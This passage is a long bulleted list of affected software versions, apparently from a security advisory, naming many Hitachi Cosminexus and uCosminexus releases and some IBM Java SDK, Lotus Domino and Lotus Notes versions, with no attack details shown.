Server - Standard Edition 4 \n * Hitachi Cosminexus Server - Web Edition 04-00 (Windows) \n * Hitachi Cosminexus Server - Web Edition 04-00-/A (Windows) \n * Hitachi Cosminexus Server - Web Edition 04-01 (HP-UX) \n * Hitachi Cosminexus Server - Web Edition 04-01 (Solaris) \n * Hitachi Cosminexus Server - Web Edition 04-01 (Windows) \n * Hitachi Cosminexus Server - Web Edition 04-01-/A (Windows) \n * Hitachi Cosminexus Server - Web Edition 4 \n * Hitachi Cosminexus Studio - Standard Edition 04-00 (Windows) \n * Hitachi Cosminexus Studio - Standard Edition 04-00-/A (Windows) \n * Hitachi Cosminexus Studio - Standard Edition 04-01 (Windows) \n * Hitachi Cosminexus Studio - Standard Edition 04-01-/A (Windows) \n * Hitachi Cosminexus Studio - Standard Edition \n * Hitachi Cosminexus Studio - Web Edition 04-00 (Windows) \n * Hitachi Cosminexus Studio - Web Edition 04-00-/A (Windows) \n * Hitachi Cosminexus Studio - Web Edition 04-01 (Windows) \n * Hitachi Cosminexus Studio - Web Edition 04-01-/A (Windows) \n * Hitachi Cosminexus Studio - Web Edition \n * Hitachi Cosminexus Studio 05-00 (Windows) \n * Hitachi Cosminexus Studio 05-00-/I (Windows) \n * Hitachi Cosminexus Studio 05-01 (Windows) \n * Hitachi Cosminexus Studio 05-01-/L (Windows) \n * Hitachi Cosminexus Studio 05-05 (Windows) \n * Hitachi Cosminexus Studio 05-05-/P (Windows) \n * Hitachi Cosminexus Studio 05-05-/Q (Windows) \n * Hitachi Cosminexus Studio 5 \n * Hitachi uCosminexus Application Server Enterprise 06-70 (AIX) \n * Hitachi uCosminexus Application Server Enterprise 06-70 (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 06-70 (HP-UX) \n * Hitachi uCosminexus Application Server Enterprise 06-70 (Linux(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 06-70 (Linux) \n * Hitachi uCosminexus Application Server Enterprise 06-70 (Solaris) \n * Hitachi uCosminexus Application Server Enterprise 06-70 (Windows(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 06-70 (Windows) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/A (AIX) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/A (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/A (HP-UX) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/A (Linux) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/A (Solaris) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/A (Windows(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/A (Windows) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/A Linux(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/B (AIX) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/B (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/B (HP-UX) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/B (Linux) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/B (Solaris) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/B (Windows) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/B(*1) (Linux) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/B(HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/B(Linux(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/C (AIX) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/C (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/C (HP-UX) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/C (Linux(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/C (Linux) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/C (Solaris) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/C (Windows) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/D (AIX) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/D (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/D (Linux) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/D (Solaris) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/D (Windows) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/E (AIX) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/E (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/E (HP-UX) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/E (Linux) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/E (Solaris) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/F (AIX) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/F (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/F (HP-UX) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/F (Linux) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/F (Solaris) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/F (Windows) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/G (AIX) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/G (Linux(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/G (Linux) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/G (Windows) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/G(HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/H (Linux(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/L (AIX) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/M (AIX) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/N (AIX) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/N (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/O (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/P (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 06-70-/Q (AIX) \n * Hitachi uCosminexus Application Server Enterprise 06-71 (Linux) \n * Hitachi uCosminexus Application Server Enterprise 06-71 (Windows) \n * Hitachi uCosminexus Application Server Enterprise 06-71-/A (Linux) \n * Hitachi uCosminexus Application Server Enterprise 06-71-/A (Windows) \n * Hitachi uCosminexus Application Server Enterprise 06-71-/B (HP-UX) \n * Hitachi uCosminexus Application Server Enterprise 06-71-/B (Linux) \n * Hitachi uCosminexus Application Server Enterprise 06-71-/B (Windows) \n * Hitachi uCosminexus Application Server Enterprise 06-71-/C (Linux) \n * Hitachi uCosminexus Application Server Enterprise 06-71-/C (Solaris) \n * Hitachi uCosminexus Application Server Enterprise 06-71-/C (Windows) \n * Hitachi uCosminexus Application Server Enterprise 06-71-/D (Linux) \n * Hitachi uCosminexus Application Server Enterprise 06-71-/D (Windows) \n * Hitachi uCosminexus Application Server Enterprise 06-71-/F (Windows) \n * Hitachi uCosminexus Application Server Enterprise 06-71-/G (Linux) \n * Hitachi uCosminexus Application Server Enterprise 06-71-/G (Windows) \n * Hitachi uCosminexus Application Server Enterprise 06-71-/H (Linux) \n * Hitachi uCosminexus Application Server Enterprise 06-71-/H (Windows) \n * Hitachi uCosminexus Application Server Enterprise 06-71-/I (Linux) \n * Hitachi uCosminexus Application Server Enterprise 06-71-/J (Windows) \n * Hitachi uCosminexus Application Server Enterprise 06-72 (HP-UX) \n * Hitachi uCosminexus Application Server Enterprise 06-72(*1) (HP-UX) \n * Hitachi uCosminexus Application Server Enterprise 06-72-/B (Linux) \n * Hitachi uCosminexus Application Server Enterprise 06-72-/B(Linux(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 06-72-/D (HP-UX) \n * Hitachi uCosminexus Application Server Enterprise 06-72-/E (HP-UX) \n * Hitachi uCosminexus Application Server Enterprise 06-72-/G(HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 07-00 (AIX) \n * Hitachi uCosminexus Application Server Enterprise 07-00 (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 07-00 (Linux) \n * Hitachi uCosminexus Application Server Enterprise 07-00 (Solaris) \n * Hitachi uCosminexus Application Server Enterprise 07-00 (Windows) \n * Hitachi uCosminexus Application Server Enterprise 07-00 HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 07-00-01 (Linux) \n * Hitachi uCosminexus Application Server Enterprise 07-00-01 (Windows) \n * Hitachi uCosminexus Application Server Enterprise 07-00-02 (Windows) \n * Hitachi uCosminexus Application Server Enterprise 07-00-03 (Windows) \n * Hitachi uCosminexus Application Server Enterprise 07-00-12 (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 07-10 (AIX) \n * Hitachi uCosminexus Application Server Enterprise 07-10 (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 07-10 (HP-UX) \n * Hitachi uCosminexus Application Server Enterprise 07-10 (Linux(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 07-10 (Linux) \n * Hitachi uCosminexus Application Server Enterprise 07-10 \n * Hitachi uCosminexus Application Server Enterprise 07-10 HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 07-10-01 HP-UX(IPF) \n * Hitachi uCosminexus Application Server Enterprise 07-10-06 (Linux(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 07-10-08 (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 07-10-1 (Linux(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 07-50 (AIX) \n * Hitachi uCosminexus Application Server Enterprise 07-50 (Linux) \n * Hitachi uCosminexus Application Server Enterprise 07-50-01 (AIX) \n * Hitachi uCosminexus Application Server Enterprise 07-50-01 (Linux) \n * Hitachi uCosminexus Application Server Enterprise 08-00 (Solaris(SPARC)) \n * Hitachi uCosminexus Application Server Enterprise 08-20 (Solaris(x64)) \n * Hitachi uCosminexus Application Server Enterprise 08-20 (Solaris(x64)) \n * Hitachi uCosminexus Application Server Enterprise 08-50 (AIX) \n * Hitachi uCosminexus Application Server Enterprise 08-50 (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 08-50 (Linux(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 08-53 (Linux) \n * Hitachi uCosminexus Application Server Enterprise 08-53 (Windows) \n * Hitachi uCosminexus Application Server Enterprise 08-70 (AIX) \n * Hitachi uCosminexus Application Server Enterprise 09-00 (AIX) \n * Hitachi uCosminexus Application Server Enterprise 09-00 (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Enterprise 09-00 (Linux) \n * Hitachi uCosminexus Application Server Enterprise 09-00 (Windows(x64)) \n * Hitachi uCosminexus Application Server Enterprise 09-00 (Windows) \n * Hitachi uCosminexus Application Server Express 07-10 (HP-UX) \n * Hitachi uCosminexus Application Server Express 08-00 (AIX) \n * Hitachi uCosminexus Application Server Express 08-00 (Linux(IPF)) \n * Hitachi uCosminexus Application Server Express 08-00 (Linux) \n * Hitachi uCosminexus Application Server Express 08-00 (Solaris(SPARC \n * Hitachi uCosminexus Application Server Express 08-00 (Windows) \n * Hitachi uCosminexus Application Server Express 08-20 (Solaris (x6) \n * Hitachi uCosminexus Application Server Express 08-50 (Linux(IPF)) \n * Hitachi uCosminexus Application Server Express 08-50 (Windows(x64)) \n * Hitachi uCosminexus Application Server Express 08-70 (AIX) \n * Hitachi uCosminexus Application Server Express 09-00 (AIX) \n * Hitachi uCosminexus Application Server Express 09-00 (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Express 09-00 (Linux) \n * Hitachi uCosminexus Application Server Express 09-00 (Windows(x64)) \n * Hitachi uCosminexus Application Server Express 09-00 (Windows) \n * Hitachi uCosminexus Application Server Light 07-10 (HP-UX) \n * Hitachi uCosminexus Application Server Light 08-50 (Linux (IPF)) \n * Hitachi uCosminexus Application Server Light 09-00 (AIX) \n * Hitachi uCosminexus Application Server Light 09-00 (HP-UX (IPF)) \n * Hitachi uCosminexus Application Server Light 09-00 (Linux) \n * Hitachi uCosminexus Application Server Light 09-00 (Windows (x64)) \n * Hitachi uCosminexus Application Server Light 09-00 (Windows) \n * Hitachi uCosminexus Application Server Smart Edition 08-70 (Windows) \n * Hitachi uCosminexus Application Server Smart Edition \n * Hitachi uCosminexus Application Server Standard 02-00 (Windows) \n * Hitachi uCosminexus Application Server Standard 06-70 (AIX) \n * Hitachi uCosminexus Application Server Standard 06-70 (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Standard 06-70 (HP-UX) \n * Hitachi uCosminexus Application Server Standard 06-70 (Linux(IPF)) \n * Hitachi uCosminexus Application Server Standard 06-70 (Linux) \n * Hitachi uCosminexus Application Server Standard 06-70 (Solaris) \n * Hitachi uCosminexus Application Server Standard 06-70 (Windows(IPF)) \n * Hitachi uCosminexus Application Server Standard 06-70 (Windows) \n * Hitachi uCosminexus Application Server Standard 06-70-/A (AIX) \n * Hitachi uCosminexus Application Server Standard 06-70-/A (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Standard 06-70-/A (HP-UX) \n * Hitachi uCosminexus Application Server Standard 06-70-/A (Linux(IPF)) \n * Hitachi uCosminexus Application Server Standard 06-70-/A (Solaris) \n * Hitachi uCosminexus Application Server Standard 06-70-/A (Windows(IPF)) \n * Hitachi uCosminexus Application Server Standard 06-70-/A (Windows) \n * Hitachi uCosminexus Application Server Standard 06-70-/B (AIX) \n * Hitachi uCosminexus Application Server Standard 06-70-/B (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Standard 06-70-/B (HP-UX) \n * Hitachi uCosminexus Application Server Standard 06-70-/B (Linux) \n * Hitachi uCosminexus Application Server Standard 06-70-/B (Solaris) \n * Hitachi uCosminexus Application Server Standard 06-70-/B (Windows) \n * Hitachi uCosminexus Application Server Standard 06-70-/B(*1) (Linux) \n * Hitachi uCosminexus Application Server Standard 06-70-/B(Linux(IPF)) \n * Hitachi uCosminexus Application Server Standard 06-70-/C (AIX) \n * Hitachi uCosminexus Application Server Standard 06-70-/C (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Standard 06-70-/C (HP-UX) \n * Hitachi uCosminexus Application Server Standard 06-70-/C (Linux(IPF)) \n * Hitachi uCosminexus Application Server Standard 06-70-/C (Linux) \n * Hitachi uCosminexus Application Server Standard 06-70-/C (Solaris) \n * Hitachi uCosminexus Application Server Standard 06-70-/C (Windows) \n * Hitachi uCosminexus Application Server Standard 06-70-/D (AIX) \n * Hitachi uCosminexus Application Server Standard 06-70-/D (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Standard 06-70-/D (Linux) \n * Hitachi uCosminexus Application Server Standard 06-70-/D (Solaris) \n * Hitachi uCosminexus Application Server Standard 06-70-/D (Windows) \n * Hitachi uCosminexus Application Server Standard 06-70-/E (AIX) \n * Hitachi uCosminexus Application Server Standard 06-70-/E (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Standard 06-70-/E (HP-UX) \n * Hitachi uCosminexus Application Server Standard 06-70-/E (Linux) \n * Hitachi uCosminexus Application Server Standard 06-70-/E (Solaris) \n * Hitachi uCosminexus Application Server Standard 06-70-/F (AIX) \n * Hitachi uCosminexus Application Server Standard 06-70-/F (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Standard 06-70-/F (HP-UX) \n * Hitachi uCosminexus Application Server Standard 06-70-/F (Linux) \n * Hitachi uCosminexus Application Server Standard 06-70-/F (Solaris) \n * Hitachi uCosminexus Application Server Standard 06-70-/F (Windows) \n * Hitachi uCosminexus Application Server Standard 06-70-/G (AIX) \n * Hitachi uCosminexus Application Server Standard 06-70-/G (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Standard 06-70-/G (Linux(IPF)) \n * Hitachi uCosminexus Application Server Standard 06-70-/G (Linux) \n * Hitachi uCosminexus Application Server Standard 06-70-/G (Windows) \n * Hitachi uCosminexus Application Server Standard 06-70-/H (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Standard 06-70-/H (Linux(IPF)) \n * Hitachi uCosminexus Application Server Standard 06-70-/I (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Standard 06-70-/J (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Standard 06-70-/K (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Standard 06-70-/L (AIX) \n * Hitachi uCosminexus Application Server Standard 06-70-/M (AIX) \n * Hitachi uCosminexus Application Server Standard 06-70-/N (AIX) \n * Hitachi uCosminexus Application Server Standard 06-70-/N (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Standard 06-70-/O (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Standard 06-70-/P (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Standard 06-70-/Q (AIX) \n * Hitachi uCosminexus Application Server Standard 06-71 (Linux) \n * Hitachi uCosminexus Application Server Standard 06-71 (Windows) \n * Hitachi uCosminexus Application Server Standard 06-71-/A (Linux) \n * Hitachi uCosminexus Application Server Standard 06-71-/A (Windows) \n * Hitachi uCosminexus Application Server Standard 06-71-/B (Linux) \n * Hitachi uCosminexus Application Server Standard 06-71-/B (Windows) \n * Hitachi uCosminexus Application Server Standard 06-71-/C (Linux) \n * Hitachi uCosminexus Application Server Standard 06-71-/C (Windows) \n * Hitachi uCosminexus Application Server Standard 06-71-/D (Linux) \n * Hitachi uCosminexus Application Server Standard 06-71-/D (Windows) \n * Hitachi uCosminexus Application Server Standard 06-71-/F (Windows) \n * Hitachi uCosminexus Application Server Standard 06-71-/G (Linux) \n * Hitachi uCosminexus Application Server Standard 06-71-/G (Windows) \n * Hitachi uCosminexus Application Server Standard 06-71-/H (Linux) \n * Hitachi uCosminexus Application Server Standard 06-71-/H (Windows) \n * Hitachi uCosminexus Application Server Standard 06-71-/I (Linux) \n * Hitachi uCosminexus Application Server Standard 06-71-/J (Windows) \n * Hitachi uCosminexus Application Server Standard 06-72 (HP-UX) \n * Hitachi uCosminexus Application Server Standard 06-72(*1) (HP-UX) \n * Hitachi uCosminexus Application Server Standard 06-72-/A (HP-UX) \n * Hitachi uCosminexus Application Server Standard 06-72-/B (HP-UX) \n * Hitachi uCosminexus Application Server Standard 06-72-/B(*1) (Linux) \n * Hitachi uCosminexus Application Server Standard 06-72-/C (Solaris) \n * Hitachi uCosminexus Application Server Standard 06-72-/D (AIX) \n * Hitachi uCosminexus Application Server Standard 06-72-/D (HP-UX) \n * Hitachi uCosminexus Application Server Standard 06-72-/E (HP-UX) \n * Hitachi uCosminexus Application Server Standard 06-72-/G(HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Standard 07-00 (AIX) \n * Hitachi uCosminexus Application Server Standard 07-00 (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Standard 07-00 (Linux) \n * Hitachi uCosminexus Application Server Standard 07-00 (Solaris) \n * Hitachi uCosminexus Application Server Standard 07-00 (Windows) \n * Hitachi uCosminexus Application Server Standard 07-00-01 (Linux) \n * Hitachi uCosminexus Application Server Standard 07-00-01 (Windows) \n * Hitachi uCosminexus Application Server Standard 07-00-02 (Windows) \n * Hitachi uCosminexus Application Server Standard 07-00-03 (Windows) \n * Hitachi uCosminexus Application Server Standard 07-10 (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Standard 07-10 (HP-UX) \n * Hitachi uCosminexus Application Server Standard 07-10 (Linux(IPF)) \n * Hitachi uCosminexus Application Server Standard 07-10 (Linux) \n * Hitachi uCosminexus Application Server Standard 07-10-01 HP-UX(IPF) \n * Hitachi uCosminexus Application Server Standard 07-50 (AIX) \n * Hitachi uCosminexus Application Server Standard 07-50 (Linux) \n * Hitachi uCosminexus Application Server Standard 07-50-01 (AIX) \n * Hitachi uCosminexus Application Server Standard 07-50-01 (Linux) \n * Hitachi uCosminexus Application Server Standard 08-00 (Solaris(SPARC)) \n * Hitachi uCosminexus Application Server Standard 08-20 (Solaris(x64)) \n * Hitachi uCosminexus Application Server Standard 08-50 (AIX) \n * Hitachi uCosminexus Application Server Standard 08-50 (HP-UX(IPF)) \n * Hitachi uCosminexus Application Server Standard 08-50 (Linux(IPF)) \n * Hitachi uCosminexus Application Server Standard 08-53 (Linux) \n * Hitachi uCosminexus Application Server Standard 08-53 (Windows) \n * Hitachi uCosminexus Application Server Standard 09-00 (AIX) \n * Hitachi uCosminexus Application Server Standard 09-00 (HP-UX (IPF)) \n * Hitachi uCosminexus Application Server Standard 09-00 (Linux) \n * Hitachi uCosminexus Application Server Standard 09-00 (Windows(x64)) \n * Hitachi uCosminexus Application Server Standard 09-00 (Windows) \n * Hitachi uCosminexus Application Server Standard \n * Hitachi uCosminexus Application Server Standard Version 6 \n * Hitachi uCosminexus Application Server Standard-R 08-70 (Windows) \n * Hitachi uCosminexus Application Server Standard-R \n * Hitachi uCosminexus Client 06-70 (Windows) \n * Hitachi uCosminexus Client 06-70-/D (Windows) \n * Hitachi uCosminexus Client 06-70-/F (Windows) \n * Hitachi uCosminexus Client 06-70-/G (Windows) \n * Hitachi uCosminexus Client 06-71 (Windows) \n * Hitachi uCosminexus Client 06-71-/D (Windows) \n * Hitachi uCosminexus Client 06-71-/F (Windows) \n * Hitachi uCosminexus Client 06-71-/G (Windows) \n * Hitachi uCosminexus Client 06-71-/H (Windows) \n * Hitachi uCosminexus Client 06-71-/J (Windows) \n * Hitachi uCosminexus Client 07-00 (Windows) \n * Hitachi uCosminexus Client 07-00-03 (AIX) \n * Hitachi uCosminexus Client 07-00-03 (Linux) \n * Hitachi uCosminexus Client 07-00-03 (Windows) \n * Hitachi uCosminexus Client 07-10 (Windows) \n * Hitachi uCosminexus Client 07-10-01 (Windows) \n * Hitachi uCosminexus Client 07-20 (Windows) \n * Hitachi uCosminexus Client 07-20-01 (Windows) \n * Hitachi uCosminexus Client 07-50 (Windows) \n * Hitachi uCosminexus Client 07-50-01 (Windows) \n * Hitachi uCosminexus Client 08-53 (Windows) \n * Hitachi uCosminexus Client 09-00 (Linux) \n * Hitachi uCosminexus Client 09-00 (Windows) \n * Hitachi uCosminexus Client 09-00 \n * Hitachi uCosminexus Client for Plug-in \n * Hitachi uCosminexus Developer 01 \n * Hitachi uCosminexus Developer Light 06-70 (Windows) \n * Hitachi uCosminexus Developer Light 06-70-/A (Windows) \n * Hitachi uCosminexus Developer Light 06-70-/B (Windows) \n * Hitachi uCosminexus Developer Light 06-70-/C (Windows) \n * Hitachi uCosminexus Developer Light 06-70-/D (Windows) \n * Hitachi uCosminexus Developer Light 06-70-/F (Windows) \n * Hitachi uCosminexus Developer Light 06-70-/G (Windows) \n * Hitachi uCosminexus Developer Light 06-71 (Windows) \n * Hitachi uCosminexus Developer Light 06-71-/A (Windows) \n * Hitachi uCosminexus Developer Light 06-71-/B (Windows) \n * Hitachi uCosminexus Developer Light 06-71-/C (Windows) \n * Hitachi uCosminexus Developer Light 06-71-/D (Windows) \n * Hitachi uCosminexus Developer Light 06-71-/F (Windows) \n * Hitachi uCosminexus Developer Light 06-71-/G (Windows) \n * Hitachi uCosminexus Developer Light 06-71-/H (Windows) \n * Hitachi uCosminexus Developer Light 06-71-/J (Windows) \n * Hitachi uCosminexus Developer Light 6 \n * Hitachi uCosminexus Developer Light 6.7 \n * Hitachi uCosminexus Developer Light 7 \n * Hitachi uCosminexus Developer Light 8 \n * Hitachi uCosminexus Developer Professional 06-70 (Windows) \n * Hitachi uCosminexus Developer Professional 06-70-/A (Windows) \n * Hitachi uCosminexus Developer Professional 06-70-/B (Windows) \n * Hitachi uCosminexus Developer Professional 06-70-/C (Windows) \n * Hitachi uCosminexus Developer Professional 06-70-/D (Windows) \n * Hitachi uCosminexus Developer Professional 06-70-/F (Windows) \n * Hitachi uCosminexus Developer Professional 06-70-/G (Windows) \n * Hitachi uCosminexus Developer Professional 06-71 (Windows) \n * Hitachi uCosminexus Developer Professional 06-71-/A (Windows) \n * Hitachi uCosminexus Developer Professional 06-71-/B (Windows) \n * Hitachi uCosminexus Developer Professional 06-71-/C (Windows) \n * Hitachi uCosminexus Developer Professional 06-71-/D (Windows) \n * Hitachi uCosminexus Developer Professional 06-71-/F (Windows) \n * Hitachi uCosminexus Developer Professional 06-71-/G (Windows) \n * Hitachi uCosminexus Developer Professional 06-71-/H (Windows) \n * Hitachi uCosminexus Developer Professional 06-71-/J (Windows) \n * Hitachi uCosminexus Developer Professional 08-53 (Windows) \n * Hitachi uCosminexus Developer Professional 09-00(Windows) \n * Hitachi uCosminexus Developer Professional 7 \n * Hitachi uCosminexus Developer Professional 8 \n * Hitachi uCosminexus Developer Professional \n * Hitachi uCosminexus Developer Professional for Plug-in 08-70 (Windows) \n * Hitachi uCosminexus Developer Professional for Plug-in \n * Hitachi uCosminexus Developer Standard 06-70 (Windows) \n * Hitachi uCosminexus Developer Standard 06-70-/A (Windows) \n * Hitachi uCosminexus Developer Standard 06-70-/B (Windows) \n * Hitachi uCosminexus Developer Standard 06-70-/C (Windows) \n * Hitachi uCosminexus Developer Standard 06-70-/D (Windows) \n * Hitachi uCosminexus Developer Standard 06-70-/F (Windows) \n * Hitachi uCosminexus Developer Standard 06-70-/G (Windows) \n * Hitachi uCosminexus Developer Standard 06-71 (Windows) \n * Hitachi uCosminexus Developer Standard 06-71-/A (Windows) \n * Hitachi uCosminexus Developer Standard 06-71-/B (Windows) \n * Hitachi uCosminexus Developer Standard 06-71-/C (Windows) \n * Hitachi uCosminexus Developer Standard 06-71-/D (Windows) \n * Hitachi uCosminexus Developer Standard 06-71-/F (Windows) \n * Hitachi uCosminexus Developer Standard 06-71-/G (Windows) \n * Hitachi uCosminexus Developer Standard 06-71-/H (Windows) \n * Hitachi uCosminexus Developer Standard 06-71-/J (Windows) \n * Hitachi uCosminexus Developer Standard 08-53 (Windows) \n * Hitachi uCosminexus Developer Standard 7 \n * Hitachi uCosminexus Developer Standard 8 \n * Hitachi uCosminexus Developer Standard \n * Hitachi uCosminexus Operator 07-00 (Windows) \n * Hitachi uCosminexus Operator 07-00-03 (AIX) \n * Hitachi uCosminexus Operator 07-00-03 (Linux) \n * Hitachi uCosminexus Operator 07-00-03 (Windows) \n * Hitachi uCosminexus Operator 07-10 (Windows) \n * Hitachi uCosminexus Operator 07-10-01 (Windows) \n * Hitachi uCosminexus Operator 07-20 (Windows) \n * Hitachi uCosminexus Operator 07-20-01 (Windows) \n * Hitachi uCosminexus Operator 07-50 (Windows) \n * Hitachi uCosminexus Operator 07-50-01 (Windows) \n * Hitachi uCosminexus Operator 7 \n * Hitachi uCosminexus Operator 8 \n * Hitachi uCosminexus Primary Server Base \n * Hitachi uCosminexus Service Architect 07-00 (Windows) \n * Hitachi uCosminexus Service Architect 07-00-03 (AIX) \n * Hitachi uCosminexus Service Architect 07-00-03 (Linux) \n * Hitachi uCosminexus Service Architect 07-00-03 (Windows) \n * Hitachi uCosminexus Service Architect 07-10 (Windows) \n * Hitachi uCosminexus Service Architect 07-10-01 (Windows) \n * Hitachi uCosminexus Service Architect 07-20 (Windows) \n * Hitachi uCosminexus Service Architect 07-20-01 (Windows) \n * Hitachi uCosminexus Service Architect 07-50 (Windows) \n * Hitachi uCosminexus Service Architect 07-50-01 (Windows) \n * Hitachi uCosminexus Service Architect 08-53 (Windows) \n * Hitachi uCosminexus Service Architect 09-00 \n * Hitachi uCosminexus Service Architect 7 \n * Hitachi uCosminexus Service Architect 8 \n * Hitachi uCosminexus Service Platform - Messaging \n * Hitachi uCosminexus Service Platform 07-00 (Linux) \n * Hitachi uCosminexus Service Platform 07-00 (Windows) \n * Hitachi uCosminexus Service Platform 07-00-03 (AIX) \n * Hitachi uCosminexus Service Platform 07-00-03 (Linux) \n * Hitachi uCosminexus Service Platform 07-00-03 (Windows) \n * Hitachi uCosminexus Service Platform 07-00-12 (Linux) \n * Hitachi uCosminexus Service Platform 07-10 (AIX) \n * Hitachi uCosminexus Service Platform 07-10 (Linux(IPF)) \n * Hitachi uCosminexus Service Platform 07-10 (Linux) \n * Hitachi uCosminexus Service Platform 07-10 (Windows) \n * Hitachi uCosminexus Service Platform 07-10-01 (Linux(IPF)) \n * Hitachi uCosminexus Service Platform 07-10-01 (Windows) \n * Hitachi uCosminexus Service Platform 07-10-06 (AIX) \n * Hitachi uCosminexus Service Platform 07-10-06 (Linux) \n * Hitachi uCosminexus Service Platform 07-20 (Windows) \n * Hitachi uCosminexus Service Platform 07-20-01 (Windows) \n * Hitachi uCosminexus Service Platform 07-50 (Linux) \n * Hitachi uCosminexus Service Platform 07-50 (Windows) \n * Hitachi uCosminexus Service Platform 07-50-01 (Windows) \n * Hitachi uCosminexus Service Platform 08-50 (AIX) \n * Hitachi uCosminexus Service Platform 08-50 (HP-UX(IPF)) \n * Hitachi uCosminexus Service Platform 08-50 (Linux(IPF)) \n * Hitachi uCosminexus Service Platform 08-53 (Linux) \n * Hitachi uCosminexus Service Platform 08-53 (Windows) \n * Hitachi uCosminexus Service Platform 09-00 (Windows) \n * Hitachi uCosminexus Service Platform 09-00 AIX (64) \n * Hitachi uCosminexus Service Platform 09-00 HP-UX (IPF) \n * Hitachi uCosminexus Service Platform 09-00 Linux (x64) \n * Hitachi uCosminexus Service Platform 09-00 Windows (x64) \n * IBM Java SDK 1.4.2 \n * IBM Java SDK 5 \n * IBM Java SDK 6 \n * IBM Java SDK 7 \n * IBM Lotus Domino 8.0 \n * IBM Lotus Domino 8.0.1 \n * IBM Lotus Domino 8.0.2 \n * IBM Lotus Domino 8.5 \n * IBM Lotus Domino 8.5.1 \n * IBM Lotus Domino 8.5.2 \n * IBM Lotus Domino 8.5.3 \n * IBM Lotus Notes 8.0.0 \n * IBM Lotus Notes 8.0.1 \n * IBM Lotus Notes 8.0.2 \n * IBM Lotus Notes 8.5 \n * IBM Lotus Notes 8.5.1 \n * IBM Lotus 